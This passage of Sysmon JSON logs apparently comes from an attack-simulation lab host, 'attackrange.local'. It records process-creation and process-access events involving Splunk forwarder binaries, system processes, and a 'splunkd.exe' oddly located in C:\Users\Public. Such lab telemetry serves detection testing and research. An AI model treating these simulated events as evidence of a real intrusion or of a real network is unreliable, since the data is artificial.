Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nProcessGuid: {E2A3D6B1-132B-5F25-0000-00109E810B00}\r\nProcessId: 752\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","ProcessGuid":"{E2A3D6B1-132B-5F25-0000-00109E810B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-00109E810B00}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-00109E810B00}","TargetProcessId":"752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-00109E810B00}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-00109E810B00}","TargetProcessId":"752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
